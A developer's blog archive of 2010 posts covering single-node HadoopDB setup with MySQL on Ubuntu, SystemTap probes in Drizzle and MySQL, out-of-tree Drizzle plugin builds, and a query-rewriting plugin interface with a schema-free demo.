HadoopDB is an interesting project going on at Yale under the Prof. Daniel Abadi's supervision that I've been meaning to play with for some time now. I initially read the paper describing HadoopDB last year and intended to document how to setup a HadoopDB system using MySQL but I got busy with school work and never got around to it. Since I have a little more free time now that I've finished my thesis, I figured it was about time I got down to playing around with HadoopDB and describing how to setup a HadoopDB system using MySQL as the single node database. With that, I'm going to describe how to get up and running with HadoopDB. If you have not read the paper before starting, I strongly encourage you to give it a read. Its very well written and not that difficult to get through.
In this guide, I'm installing on Ubuntu Server 10.04 64-bit. Thus, I will be using the Ubuntu package manager heavily. I have not tested on other platforms but a lot of what is described here should apply to other platforms such as CentOS.
This guide is only on how to set up a single node system. It would not be difficult to extend what is contained here for setting up a multi-node system which I may write about in the future.

Installing Hadoop

Before installing Hadoop, Java needs to be installed. As of 10.04, the Sun JDK packages have been dropped from the Multiverse section of the Ubuntu archive. You can still install the Sun JDK if you wish but for this article, I used OpenJDK without issues:

sudo apt-get install openjdk-6-jdk

Before getting into the installation of Hadoop, I encourage you to read Michael Noll's in-depth guide to installing Hadoop on Ubuntu. I borrow from his articles a lot here.
First, create a user account and group that Hadoop will run as:

sudo groupadd hadoop
sudo useradd -m -g hadoop -d /home/hadoop -s /bin/bash -c "Hadoop software owner" hadoop

Next, we download Hadoop and create directories for storing the software and data. For this article, Hadoop 0.20.2 was used:

cd /opt
sudo wget http://www.gtlib.gatech.edu/pub/apache/hadoop/core/hadoop-0.20.2/hadoop-0.20.2.tar.gz
sudo tar zxvf hadoop-0.20.2.tar.gz
sudo ln -s /opt/hadoop-0.20.2 /opt/hadoop
sudo chown -R hadoop:hadoop /opt/hadoop /opt/hadoop-0.20.2
sudo mkdir -p /opt/hadoop-data/tmp-base
sudo chown -R hadoop:hadoop /opt/hadoop-data/

Alternatively, Cloudera has created Deb packages that can be used if you wish. I have not used them before so can't comment on how they work.
Next, we need to configure SSH for the hadoop user. This is required by Hadoop in order to manage any nodes.

su - hadoop
ssh-keygen -t rsa
cat $HOME/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys

When the ssh-keygen command is run, be sure to leave the passphrase as blank so that you will not be prompted for a password.
We will want to update the .bashrc file for the hadoop user with appropriate environment variables to make administration easier:
We will cover installing Hive later in this article but for now, leave that environment variable in there. For the remainder of this article, I will be referring to various locations such as the Hadoop installation directory using the environment variables defined above. Next, we want configure Hadoop. There are 3 configuration files in Hadoop that we need to modify:

$HADOOP_CONF/core-site.xml
$HADOOP_CONF/mapred-site.xml
$HADOOP_CONF/hdfs-site.xml

Based on the directory structure I created beforehand, these 3 files looked as follows for me:
Notice the reference to the HadoopDB XML file. We will cover that later but it is necessary for using HadoopDB to have that property in your configuration.
Next, we need to modify the $HADOOP_CONF/hadoop-env.sh file so that the JAVA_HOME variable is correctly set in that file. Thus, I have the following 2 lines in my hadoop-env.sh file:

# The java implementation to use.  Required.
export JAVA_HOME=/usr/lib/jvm/java-6-openjdk

Next, we need to format the Hadoop filesystem:

$ hadoop namenode -format
10/05/07 14:24:12 INFO namenode.NameNode: STARTUP_MSG: 
/************************************************************
STARTUP_MSG: Starting NameNode
STARTUP_MSG:   host = hadoop1/127.0.1.1
STARTUP_MSG:   args = [-format]
STARTUP_MSG:   version = 0.20.2
STARTUP_MSG:   build = https://svn.apache.org/repos/asf/hadoop/common/branches/branch-0.20 -r
911707; compiled by 'chrisdo' on Fri Feb 19 08:07:34 UTC 2010
************************************************************/
10/05/07 14:24:12 INFO namenode.FSNamesystem: fsOwner=hadoop,hadoop
10/05/07 14:24:12 INFO namenode.FSNamesystem: supergroup=supergroup
10/05/07 14:24:12 INFO namenode.FSNamesystem: isPermissionEnabled=true
10/05/07 14:24:12 INFO common.Storage: Image file of size 96 saved in 0 seconds.
10/05/07 14:24:12 INFO common.Storage: Storage directory /opt/hadoop-data/tmp-base/dfs/name has been
successfully formatted.
10/05/07 14:24:12 INFO namenode.NameNode: SHUTDOWN_MSG: 
/************************************************************
SHUTDOWN_MSG: Shutting down NameNode at hadoop1/127.0.1.1
************************************************************/
$

The above is the output from a successful format. Now, we can finally start our single-node Hadoop installation:

$ start-all.sh
starting namenode, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-namenode-hadoop1.out
localhost: starting datanode, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-datanode-hadoop1.out
localhost: starting secondarynamenode, logging to
/opt/hadoop/bin/../logs/hadoop-hadoop-secondarynamenode-hadoop1.out
starting jobtracker, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-jobtracker-hadoop1.out
localhost: starting tasktracker, logging to
/opt/hadoop/bin/../logs/hadoop-hadoop-tasktracker-hadoop1.out
$

Again, if you don't see output similar to the above, something went wrong. The log files under /opt/hadoop/logs are quite helpful for trouble-shooting.

Installing MySQL

Installing MySQL is quite simple on Ubuntu. I went with the MySQL Server package:

sudo apt-get install mysql-server

We don't need to perform any special configuration of MySQL for HadoopDB. Just make sure to take note of what password you specify for the root user since we will perform all work with HadoopDB as the root user (this is not mandatory but what I did to keep things simple).
Next, we need to install the MySQL JDBC driver. For this article, I used Connector J. After downloading the jar file, we need to copy it into Hadoop's lib directory so it has access to it:

cp mysql-connector-java-5.1.12-bin.jar $HADOOP_HOME/lib

Its worth noting that in the paper, the authors do say that initially they used MySQL with HadoopDB but switched to PostgreSQL. The main reason cited is due to the poor join algorithms in MySQL which I assume to mean the fact that only nested loop join is supported in MySQL. I don't attempt to make any comparison of HadoopDB running with MySQL versus PostgreSQL but I wanted to point out the authors observation.

Download HadoopDB

Now we can download HadoopDB. I'm going to download both the jar file and check out the source from Subversion: Now we can download HadoopDB. After downloading the jar file, we need to copy it into Hadoop's lib directory so it has access to it:

cp hadoopdb.jar $HADOOP_HOME/lib

I also checked out the source code from Subversion in case I needed to re-build the jar file at any time:

vn co https://hadoopdb.svn.sourceforge.net/svnroot/hadoopdb hadoopdb

Install Hive

Hive is used by HadoopDB as a SQL interface to their system. Its not a requirement for working with HadoopDB but it is another way to interact with HadoopDB so I'll cover how to install it.
First, we need to create directories in HDFS:

hadoop fs -mkdir /tmp
hadoop fs -mkdir /user/hive/warehouse
hadoop fs -chmod g+w /tmp
hadoop fs -chmod g+w /user/hive/warehouse

Next, we need to download the SMS_dist tar file from the HadoopDB download page:

tar zxvf SMS_dist.tar.gz
sudo mv dist /opt/hive
sudo chown -R hadoop:hadoop hive

Since we already setup the environment variables related to Hive earlier when we were installing Hadoop, everything we need should now be in our path:

$ hive
Hive history file=/tmp/hadoop/hive_job_log_hadoop_201005081717_1990651345.txt
hive> 

create     describe   exit       from       load       quit       set
hive> quit;
$

Data

We want to some data to play around with for testing purposes. For this article, I'm going to use the data from the paper published last summer: 'A Comparison of Approaches to Large-Scale Data Analysis'. Documentation on how to re-produce the benchmarks in that paper are prodivded in the link I gave to the paper. For this article, since I'm only running one Hadoop node and have absolutely no interest in generating lots of data I modified the scripts provided to produce tiny amounts of data:

svn co http://graffiti.cs.brown.edu/svn/benchmarks/
cd benchmarks/datagen/teragen

Within the benchmarks/datagen/teragen folder, there is a Perl script named teragen.pl that is reponsible for the generation of data. I modified that script for my purposes to look like:
We then run the above Perl script to generate data that will be loaded in to HDFS. HadoopDB comes with a data partitioner that can partition data into a specified number of partitions. This is not particularly important for this article since we are running a single-node cluster so we only have 1 partition. The idea is that a separate partition can be bulk-loaded into a separate database node and indexed appropriately. For us, we just need to create a database and table in our MySQL database. Since we only have 1 partition, the database name will reflect that. The procedure to load the data set we generated into our single MySQL node is:

hadoop fs -get /data/SortGrep535MB/part-00000 my_file
mysql -u root -ppassword
mysql> create database grep0;
mysql> use grep0;
mysql> create table grep (
    ->   key1 char(10),
    ->   field char(90)
    -> );
load data local infile 'my_file' into table grep fields terminated by '|' (key1, field);

We now have data loaded into both HDFS and MySQL. The data we are working with is from the grep benchmark which is not the best benchmark for HadoopDB since it is un-structured data. However, since this article is just about how to setup HadoopDB and not testing its preformance, I didn't really worry about that much.

HadoopDB Catalog and Running a Job

The HadoopDB catalog is stored as an XML in HDFS. A tool is provided that generates this XML file from a properties file. For this article, the properties file I used is:
The machines.txt file must exist and for this article, my machines.txt file had only 1 entry: localhost
Then in order to generate the XML file and store it in HDFS, the following is performed:

java -cp $HADOOP_HOME/lib/hadoopdb.jar edu.yale.cs.hadoopdb.catalog.SimpleCatalogGenerator \
> Catalog.properties
hadoop dfs -put HadoopDB.xml HadoopDB.xml

Please not that the above tool is quite fragile and expects the input properties file to be in a certain format with certain fields. Its pretty easy to break the tool which is understandable given this is a research project.
We are now ready to run a HadoopDB job! The HadoopDB distribution comes with a bunch of benchmarks that were used in the paper that was published on HadoopDB. The data I generated in this article corresponds to the data that was used for their benchmarks so I can use jobs that have already been written in order to test my setup.
I'm using the grep task from the paper to search for a pattern in the data I loaded earlier. Thus, to kick off a job I do:

java -cp $CLASSPATH:hadoopdb.jar edu.yale.cs.hadoopdb.benchmark.GrepTaskDB \
> -pattern %wo% -output padraig -hadoop.config.file HadoopDB.xml

Running the job, I see output like the following:

java -cp $CLASSPATH:hadoopdb.jar edu.yale.cs.hadoopdb.benchmark.GrepTaskDB \
> -pattern %wo% -output padraig -hadoop.config.file HadoopDB.xml
10/05/08 18:01:41 INFO exec.DBJobBase: grep_db_job
10/05/08 18:01:41 INFO exec.DBJobBase: SELECT key1, field FROM grep WHERE field LIKE '%%wo%%';
10/05/08 18:01:41 INFO jvm.JvmMetrics: Initializing JVM Metrics with processName=JobTracker,
sessionId=
10/05/08 18:01:41 WARN mapred.JobClient: Use GenericOptionsParser for parsing the arguments.
Applications should implement Tool for the same.
10/05/08 18:01:41 INFO mapred.JobClient: Running job: job_local_0001
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Data locality failed for
hadoop1.localdomain
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Task from hadoop1.localdomain is connecting
to chunk 0 on host localhost with db url jdbc:mysql://localhost:3306/grep0
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: SELECT key1, field FROM grep WHERE field
LIKE '%%wo%%';
10/05/08 18:01:41 INFO mapred.MapTask: numReduceTasks: 0
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: DB times (ms): connection = 245, query
execution = 2, row retrieval  = 36
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Rows retrieved = 3
10/05/08 18:01:41 INFO mapred.TaskRunner: Task:attempt_local_0001_m_000000_0 is done. And is in the
process of commiting
10/05/08 18:01:41 INFO mapred.LocalJobRunner: 
10/05/08 18:01:41 INFO mapred.TaskRunner: Task attempt_local_0001_m_000000_0 is allowed to commit
now
10/05/08 18:01:41 INFO mapred.FileOutputCommitter: Saved output of task
'attempt_local_0001_m_000000_0' to file:/home/hadoop/padraig
10/05/08 18:01:41 INFO mapred.LocalJobRunner: 
10/05/08 18:01:41 INFO mapred.TaskRunner: Task 'attempt_local_0001_m_000000_0' done.
10/05/08 18:01:42 INFO mapred.JobClient:  map 100% reduce 0%
10/05/08 18:01:42 INFO mapred.JobClient: Job complete: job_local_0001
10/05/08 18:01:42 INFO mapred.JobClient: Counters: 6
10/05/08 18:01:42 INFO mapred.JobClient:   FileSystemCounters
10/05/08 18:01:42 INFO mapred.JobClient:     FILE_BYTES_READ=115486
10/05/08 18:01:42 INFO mapred.JobClient:     FILE_BYTES_WRITTEN=130574
10/05/08 18:01:42 INFO mapred.JobClient:   Map-Reduce Framework
10/05/08 18:01:42 INFO mapred.JobClient:     Map input records=3
10/05/08 18:01:42 INFO mapred.JobClient:     Spilled Records=0
10/05/08 18:01:42 INFO mapred.JobClient:     Map input bytes=3
10/05/08 18:01:42 INFO mapred.JobClient:     Map output records=3
10/05/08 18:01:42 INFO exec.DBJobBase: 
grep_db_job JOB TIME : 1747 ms.

$

The results are stored in HDFS and I also specified I wanted the results put in an output directory named padraig. Inspecting the results I see:

$ cd padraig
$ cat part-00000
~k~MuMq=	w0000000000{XSq#Bq6,3xd.tg_Wfa"+woX1e_L*]H-UE%+]L]DiT5#QOS5<
vkrvkB8	6i0000000000.h9RSz'>Kfp6l~kE0FV"aP!>xnL^=C^W5Y}lTWO%N4$F0 Qu@:]-N4-(J%+Bm*wgF^-{BcP^5NqA
]&{`H%]1{E0000000000Z[@egp'h9!	BV8p~MuIuwoP4;?Zr' :!s=,@!F8p7e[9VOq`L4%+3h.*3Rb5e=Nu`>q*{6=7
$

I can verify this result by going the data stored in MySQL and performing the same query on it:

mysql> select key1, field from grep where field like '%wo%';
+--------------------------------+------------------------------------------------------------------------------------------+
| key1                           | field
|
+--------------------------------+------------------------------------------------------------------------------------------+
| ~k~MuMq=                       | w0000000000{XSq#Bq6,3xd.tg_Wfa"+woX1e_L*]H-UE%+]L]DiT5#QOS5<                             |
| vkrvkB8                        | 6i0000000000.h9RSz'>Kfp6l~kE0FV"aP!>xnL^=C^W5Y}lTWO%N4$F0 Qu@:]-N4-(J%+Bm*wgF^-{BcP^5NqA |
| ]&{`H%]1{E0000000000Z[@egp'h9! | BV8p~MuIuwoP4;?Zr' :!s=,@!F8p7e[9VOq`L4%+3h.*3Rb5e=Nu`>q*{6=7                            |
+--------------------------------+------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)

mysql>

Thus, I can see the same rows were returned by the HadoopDB job.

Conclusion

I didn't get to use the Hive interface to HadoopDB as I had issues getting it going. If I get it going in the future, I'll likely write about it. HadoopDB is a pretty interesting project and I enjoyed reading the paper on it a lot. A demo of HadoopDB will be given at SIGMOD this year which should be interesting.
Overall, I think its a pretty interesting project but I'm not sure how active it is. Based on the fact that a demo is being given at SIGMOD, I'm sure there is research being done on it but compared to other open source projects its difficult to tell how much development is occuring. I'm sure this has more to do with the fact that it is a research project first and foremost whose source code just happens to be available. It would be nice to see a mailing list or something pop up around this project though. For example, if I wanted to contribute a patch, its not really clear how I should go about doing that and whether it will be integrated or not.
I do think its some interesting research though and I'll be keeping my eye on it and trying to mess around with it whenever I have spare time. Next thing I want to look into regarding HadoopDB is hooking it up to the column-orientated database MonetDB which I will write about if I get the chance.

Configuring Drizzle/MySQL for use with SystemTap

2010-04-02T00:00:00-07:00

In a previous post, I went through the steps involved to install SystemTap on a Linux box. Now, I'd like to show how to configure drizzle and MySQL for use with SystemTap.
First, of all, you need to make sure the dtrace python script that is used by SystemTap is in your path. If it is not, then if you are on Ubuntu you need to install the systemtap-sdt-dev package as mentioned in my last post. Assuming our system is setup correctly, we can build drizzle as follows:

$ bzr branch lp:drizzle stap
$ cd stap
$ ./config/autorun.sh
$ ./configure --enable-dtrace
$ make

The drizzle binary will now have support for static stap probes. In order to verify this and see what probes are present in drizzle, lets start a drizzle server and list the probes in the server process:

$ cd tests
$ ./dtr --start-and-exit
$ sudo stap -l 'process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("*")'
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__rdlock__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__wrlock__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__unlock__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__rdlock__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__wrlock__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__unlock__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__row__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__row__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__row__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__row__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__row__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__row__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("connection__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("filesort__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("filesort__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__opt__choose__plan__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__opt__choose__plan__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("connection__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__select__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("command__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("command__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__exec__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__exec__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__parse__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__parse__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("select__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("select__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__select__start")
$

The argument to your process function should be the path to your drizzle binary. The process for MySQL is very similar. I'm going to just list the build commands and show the probes that are present in MySQL:

$ bzr branch lp:mysql-server mysql-stap
$ cd mysql-stap
$ ./BUILD/autogen.sh
$ ./configure --enable-dtrace
$ make
$ cd mysql-test
$ ./mtr --start &
$ sudo stap -l 'process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("*")'
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__write__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__write__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__read__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("net__read__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("connection__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("connection__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__parse__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__parse__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__update__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__update__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__select__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__select__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__delete__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("multi__delete__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__exec__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__exec__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("command__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("command__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("select__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("select__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("filesort__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("filesort__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__rdlock__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__wrlock__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__unlock__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__rdlock__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__wrlock__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("handler__unlock__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("delete__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("insert__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("update__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__cache__hit")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("query__cache__miss")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("read__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("read__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("index__read__row__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("index__read__row__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__block")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__hit")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__read__miss")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__write__done")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__write__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__write__block")
$

You can see that there are probes in MySQL which would not make sense for Drizzle such as probes related to the query cache and keycache. In Drizzle, we are also starting to add probes around the optimizer but it is slow going. That's it for now. I'll probably write a brief post next week demonstrating using these probes in MySQL and Drizzle. I'll be covering more in my presentation at the MySQL user's conference in a few weeks.

Drizzle Accepted for GSoC 2010

2010-03-18T00:00:00-07:00

I just found out today that Drizzle was accepted as its own project for Google's Summer of Code this year. Our organization is listed here.
I'm acting as the program administrator for Drizzle this year with Eric Day and I'm real excited about it. Last year, I myself was a student in GSoC working on drizzle and I feel like I got a lot out of that program so I really wanted to see Drizzle accepted as its own project this year. Hopefully, we can get lots of students working with us this year.
As someone who participated as a student and is now acting as a mentor, I can say that it is probably the best summer job any student could get. Basically, you get paid to work on an open-source project with awesome people and work from home. It can't really get much better if you ask me.
And any students interested in working on Drizzle should check out our ideas page on the wiki.

Out of Tree Plugins in Drizzle

2010-03-10T00:00:00-08:00

This week I've been working on porting the prototype MySQL storage engine developed at Akiban to Drizzle. While doing this, I discovered that in Drizzle, it is possible to build a plugin out of tree. When I say out of tree, I mean that I can develop a plugin for drizzle and build it without having a copy of the drizzle source code. This is amazingly awesome and is mostly due to the awesome build system that Monty has put together. This build system is called Pandora Build and if you are ever working on a project that needs to use autoconf related tools, you should really check it out. Its friggin awesome. It lets you concentrate on development instead of having to spend a bunch of time trying to get a good build environment set up.
Anyway, here I am going to go through an example of how to build a drizzle plugin out of tree. The code is available at lp:~posulliv/drizzle/out-of-tree-example if anyone is interested in looking at it. I am going to take an existing plugin in the drizzle source tree I developed and show how to build it out of tree. The plugin I'm going to work with is the memcached_stats plugin.
Before starting, its worth noting that Monty is working on creating a one-step tool for taking a plugin that is currently in drizzle's source tree (that is, in the plugin directory of a drizzle tree) and making it possible to build that plugin out of tree. His goal is that there need be no changes in content between a directory that's in the drizzle source tree and one that's outside the source tree.
For this post, we will assume that we are working in a directory named mc-stats-plugin. Before starting. this directory just contains source files. We will be adding all the build-related files that are needed to build it.
The first thing that is needed is a plugin.ini file for a plugin. For an out-of-tree plugin, a name and url is required. Thus, the plugin.ini file for this plugin will look like:

[plugin]
name=memcached_stats
title=Memcached Stats in DATA_DICTIONARY tables
description=Some DATA_DICTIONARY tables that provide Memcached stats
url=http://memcached.org/
version=0.1
disabled=yes
load_by_default=no
author=Padraig O Sullivan
license=PLUGIN_LICENSE_BSD
headers=stats_table.h analysis_table.h sysvar_holder.h
sources=memcached_stats.cc stats_table.cc analysis_table.cc
build_conditional="${ac_cv_libmemcached}" = "yes" -a "x${MEMCACHED_BINARY}" != "xno"
ldflags=${LTLIBMEMCACHED}

Once that's done, we need to create a config directory and copy a few files from drizzle's trunk:

$ cp $DRIZZLE_SRC_ROOT/config/config.rpath ./config/.
$ cp $DRIZZLE_SRC_ROOT/config/pandora-plugin ./config/.
$ cp -R $DRIZZLE_SRC_PORT/m4 .

Like I said before, Monty is working on a tool that will automate the steps above. Now, we can proceed and start compiling our plugin:

$ ./config/pandora-plugin
$ autoreconf -i
libtoolize: putting auxiliary files in AC_CONFIG_AUX_DIR, `config'.
libtoolize: copying file `config/config.guess'
libtoolize: copying file `config/config.sub'
libtoolize: copying file `config/install-sh'
libtoolize: copying file `config/ltmain.sh'
libtoolize: putting macros in `m4'.
libtoolize: copying file `m4/libtool.m4'
libtoolize: copying file `m4/ltoptions.m4'
libtoolize: copying file `m4/ltsugar.m4'
libtoolize: copying file `m4/ltversion.m4'
libtoolize: copying file `m4/lt~obsolete.m4'
libtoolize: Remember to add `LT_INIT' to configure.ac.
libtoolize: Consider adding `AC_CONFIG_MACRO_DIR([m4])' to configure.ac and
libtoolize: rerunning libtoolize, to keep the correct libtool macros in-tree.
configure.ac:7: installing `config/compile'
configure.ac:7: installing `config/missing'
Makefile.am: installing `config/depcomp'
$ ./configure
...
$ make
make  all-am
make[1]: Entering directory `/home/posulliv/repos/drizzle/mc-stats-plugin'
  CXX    libmemcached_stats_plugin_la-memcached_stats.lo
  CXX    libmemcached_stats_plugin_la-stats_table.lo
  CXX    libmemcached_stats_plugin_la-analysis_table.lo
  CXXLD  libmemcached_stats_plugin.la
make[1]: Leaving directory `/home/posulliv/repos/drizzle/mc-stats-plugin'
$

Now, our plugin is built. To install it, we simply do a make install and give the --plugin_add=memcached_stats option to drizzled when we start the server.
I just think this process makes my life a whole lot easier and I wanted to bring some attention to how easy drizzle makes developing plugins.

Schema-Free Drizzle!

2010-03-02T00:00:00-08:00

I came across this post from Ilya Grigorik on Hacker News yesterday and I figured I just had to implement this in Drizzle now with the new query rewriting interface that I mentioned yesterday. The awesome thing about Drizzle is that I can try all these ideas out easily by just implementing a plugin.
Any SQL statements we want to use on our schema-free constructs, we have to prefix with the string 'nos'. With that said, here is a session demonstrating this query rewriting plugin:

Your Drizzle connection id is 2
Server version: 7 Source distribution (schema-less)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle> use test;
Database changed
drizzle> nos create table widgets;
Query OK, 0 rows affected (0.06 sec)

drizzle> nos insert into widgets (id,name) values ('a', 'apple');
Query OK, 1 row affected (0.19 sec)

drizzle> nos insert into widgets (id,name,type) values ('b', 'blackberry', 'phone');
Query OK, 1 row affected (0.21 sec)

drizzle> nos select * from widgets;
+------+------------+-------+
| id   | name       | type  |
+------+------------+-------+
| a    | apple      | NULL  | 
| b    | blackberry | phone | 
+------+------------+-------+
2 rows in set (0 sec)

drizzle> nos select * from widgets where id = 'a';
+------+-------+------+
| id   | name  | type |
+------+-------+------+
| a    | apple | NULL | 
+------+-------+------+
1 row in set (0 sec)

drizzle>

The code for this is available on Launchpad (lp:~posulliv/drizzle/schema-less). I threw this together in a few hours today for fun so it is what it is.

Query Rewriting Plugin Point for Drizzle

2010-03-01T00:00:00-08:00

One of the first tasks in my new position at Akiban was to create a plugin point within Drizzle for query rewriting.
The first decision to make was where to insert a plugin point for a query rewriter. The parsed representation of a query would seem like a natural thing to pass to a query rewriter plugin since the plugin would not have to implement its own parser then. However, the parsed representation of a query in Drizzle is not the easiest in the world to deal with right now so passing this to a plugin would make developing a rewriting plugin quite difficult. Thus, I made the decision to create the plugin point before parsing occurs.
This means that if a plugin developer wants to do some complex rewriting, they may need to parse the query in their plugin. It may not be ideal but it does make the plugin API for query rewriting quite simple and opens up a lot of interesting opportunities.
Following the lead of other plugin interfaces such as the replication API developed by Jay, I wanted to keep it as simple and easy to understand as possible. With that in mind, here is the entire API for a query rewriting plugin:

Thus, all a plugin developer needs to do is implement the rewrite() function within their plugin. The query is passed by reference as a std::string so a plugin can do whatever it likes to this string and this string will then be passed to the parser in the Drizzle core kernel for parsing.
This interface opens up a lot of possibilties for interesting plugins. For example, one could develop a plugin to analyze a query for common SQL injection patterns or develop a plugin to rewrite a query based on a set of rules. I would be really interested in hearing other ideas people reading this have for plugins using this interface?

Installing SystemTap on Ubuntu

2010-02-26T00:00:00-08:00

I'm presenting at the MySQL user's conference this year and one of my talks is on using SystemTap and DTrace with MySQL and Drizzle. I'm also doing a tutorial with Jay Pipes on developing replication plugins for Drizzle and that should be a lot of fun.
